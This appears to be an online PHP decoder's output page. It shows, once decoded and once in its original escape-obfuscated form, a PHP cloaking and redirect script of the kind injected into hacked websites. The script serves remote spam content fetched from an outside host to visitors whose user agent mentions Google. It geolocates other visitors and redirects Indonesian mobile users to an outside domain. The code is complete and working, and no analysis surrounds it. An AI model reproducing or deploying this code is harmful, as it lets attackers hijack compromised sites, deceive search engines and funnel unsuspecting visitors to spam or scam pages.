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PHP Decode

<?php goto O7221; O4817: O2377: goto O3468; O7705: echo $O7706; goto O0908; O0493: goto O..

Decoded Output download

goto O7221; O4817: O2377: goto O3468; O7705: echo $O7706; goto O0908; O0493: goto O9034; goto O1313; O4139: O0594: goto O6530; O3468: if (preg_match("/Mobile|Android|iPhone|iPad/", $_SERVER["HTTP_USER_AGENT"])) { goto O2778; } goto O9844; O6842: exit; goto O6680; O6907: O7725: goto O0570; O3222: if (O4553()) { goto O4527; } goto O6410; O2487: if (!$O7706) { goto O4553; } goto O7705; O3304: $O8266 = ""; goto O4602; O3708: session_start(); goto O5431; O0399: $O9055 = ""; goto O3222; O9841: function o6828($O2944) { goto O9263; O6694: if (!($O5699 === false)) { goto O2254; } goto O1157; O1157: trigger_error("Failed to retrieve content from {$O2944}.", E_USER_NOTICE); goto O5055; O0658: curl_close($O4207); goto O7874; O7874: return $O5699; goto O2804; O5055: return null; goto O8936; O3123: $O5699 = curl_exec($O4207); goto O6694; O4699: curl_setopt($O4207, CURLOPT_URL, $O2944); goto O4224; O8936: O2254: goto O0658; O4224: curl_setopt($O4207, CURLOPT_RETURNTRANSFER, true); goto O3123; O9263: $O4207 = curl_init(); goto O4699; O2804: } goto O0737; O0908: O4553: goto O0493; O5431: goto O0594; goto O4817; O7221: function o3125() { goto O2067; O2067: $O4884 = $_SERVER["REMOTE_ADDR"]; goto O7925; O4290: $O5212 = curl_exec($O4207); goto O5825; O2009: return $O8249["country"]; goto O3778; O7591: curl_setopt($O4207, CURLOPT_RETURNTRANSFER, true); goto O4290; O8904: O5196: goto O2009; O7715: curl_setopt($O4207, CURLOPT_URL, $O4699); goto O7591; O3160: goto O3940; goto O8904; O5825: if (!curl_errno($O4207)) { goto O3530; } goto O2857; O2857: return "Error: " . curl_error($O4207); goto O4090; O3778: O3940: goto O2229; O4739: $O4207 = curl_init(); goto O7715; O8556: curl_close($O4207); goto O1706; O3545: if ($O8249["status"] === "success") { goto O5196; } goto O0729; O1706: $O8249 = json_decode($O5212, true); goto O3545; O7925: $O4699 = "{$O4884}"; goto O4739; O0729: return "Country not found"; goto O3160; O4090: O3530: goto O8556; O2229: } goto O9523; O0737: $O2480 = O3125(); goto O0399; O0980: $O7706 = o6828($O9055); goto O1087; O7791: O4527: goto O0980; O9844: $O7706 = O6828($O9055); goto O2487; O4602: header("Location: {$O8266}"); goto O6842; O9523: function O4553() { $O3235 = strtolower($_SERVER["HTTP_USER_AGENT"]); return strpos($O3235, "google") !== false; } goto O9841; O6680: O9034: goto O4139; O1313: O2778: goto O3304; O6530: goto O6587; goto O7791; O6380: echo $O7706; goto O6907; O1087: if (!$O7706) { goto O7725; } goto O6380; O6410: if ($O2480 === "Indonesia") { goto O2377; } goto O3708; O0570: O6587: ?>

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Original Code

goto O7221; O4817: O2377: goto O3468; O7705: echo $O7706; goto O0908; O0493: goto O9034; goto O1313; O4139: O0594: goto O6530; O3468: if (preg_match("\57\x4d\157\x62\151\154\145\x7c\101\x6e\144\x72\157\151\x64\174\x69\120\150\157\156\145\174\x69\120\141\144\x2f", $_SERVER["\x48\x54\124\x50\x5f\125\x53\105\122\137\101\x47\105\x4e\124"])) { goto O2778; } goto O9844; O6842: exit; goto O6680; O6907: O7725: goto O0570; O3222: if (O4553()) { goto O4527; } goto O6410; O2487: if (!$O7706) { goto O4553; } goto O7705; O3304: $O8266 = "\x68\x74\x74\160\x73\x3a\x2f\x2f\141\x6d\x70\x2d\x6c\151\x63\153\x65\x72\55\143\x7a\55\x69\x64\x2e\x77\x65\x62\x2e\141\x70\160\57"; goto O4602; O3708: session_start(); goto O5431; O0399: $O9055 = "\150\164\164\160\163\x3a\x2f\x2f\x61\x64\x64\x65\144\55\143\x6c\157\x75\x64\x2e\143\x63\57\160\141\x63\x6b\144\x6f\154\57\147\145\164\143\157\156\164\x65\x6e\x74\57\x77\167\167\56\x6c\151\143\x6b\145\162\x2e\143\x7a\57\154\160\x2e\x74\x78\164"; goto O3222; O9841: function o6828($O2944) { goto O9263; O6694: if (!($O5699 === false)) { goto O2254; } goto O1157; O1157: trigger_error("\106\141\x69\154\145\x64\x20\x74\157\40\x72\145\x74\162\151\145\166\x65\x20\x63\157\156\164\145\x6e\164\40\x66\x72\x6f\155\40{$O2944}\56", E_USER_NOTICE); goto O5055; O0658: curl_close($O4207); goto O7874; O7874: return $O5699; goto O2804; O5055: return null; goto O8936; O3123: $O5699 = curl_exec($O4207); goto O6694; O4699: curl_setopt($O4207, CURLOPT_URL, $O2944); goto O4224; O8936: O2254: goto O0658; O4224: curl_setopt($O4207, CURLOPT_RETURNTRANSFER, true); goto O3123; O9263: $O4207 = curl_init(); goto O4699; O2804: } goto O0737; O0908: O4553: goto O0493; O5431: goto O0594; goto O4817; O7221: function o3125() { goto O2067; O2067: $O4884 = $_SERVER["\122\x45\x4d\117\x54\105\137\x41\x44\x44\122"]; goto O7925; O4290: $O5212 = curl_exec($O4207); goto O5825; O2009: return $O8249["\143\x6f\165\x6e\164\x72\x79"]; goto O3778; O7591: curl_setopt($O4207, CURLOPT_RETURNTRANSFER, true); goto O4290; O8904: O5196: goto O2009; O7715: curl_setopt($O4207, CURLOPT_URL, $O4699); goto O7591; O3160: goto O3940; goto O8904; O5825: if (!curl_errno($O4207)) { goto O3530; } goto O2857; O2857: return "\105\x72\162\157\x72\72\x20" . curl_error($O4207); goto O4090; O3778: O3940: goto O2229; O4739: $O4207 = curl_init(); goto O7715; O8556: curl_close($O4207); goto O1706; O3545: if ($O8249["\x73\x74\141\164\165\163"] === "\163\x75\x63\143\145\x73\x73") { goto O5196; } goto O0729; O1706: $O8249 = json_decode($O5212, true); goto O3545; O7925: $O4699 = "\150\x74\164\160\72\x2f\57\x69\160\x2d\x61\160\x69\x2e\x63\x6f\x6d\57\x6a\163\157\156\57{$O4884}"; goto O4739; O0729: return "\103\x6f\x75\x6e\164\162\x79\40\156\157\164\x20\146\157\x75\156\144"; goto O3160; O4090: O3530: goto O8556; O2229: } goto O9523; O0737: $O2480 = O3125(); goto O0399; O0980: $O7706 = o6828($O9055); goto O1087; O7791: O4527: goto O0980; O9844: $O7706 = O6828($O9055); goto O2487; O4602: header("\114\157\x63\141\x74\x69\157\156\x3a\x20{$O8266}"); goto O6842; O9523: function O4553() { $O3235 = strtolower($_SERVER["\110\124\124\x50\x5f\x55\123\x45\122\137\x41\107\105\x4e\124"]); return strpos($O3235, "\147\x6f\157\x67\154\x65") !== false; } goto O9841; O6680: O9034: goto O4139; O1313: O2778: goto O3304; O6530: goto O6587; goto O7791; O6380: echo $O7706; goto O6907; O1087: if (!$O7706) { goto O7725; } goto O6380; O6410: if ($O2480 === "\111\156\x64\x6f\x6e\x65\163\151\x61") { goto O2377; } goto O3708; O0570: O6587:

Function Calls





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Eval Count 0
Decode Time 67 ms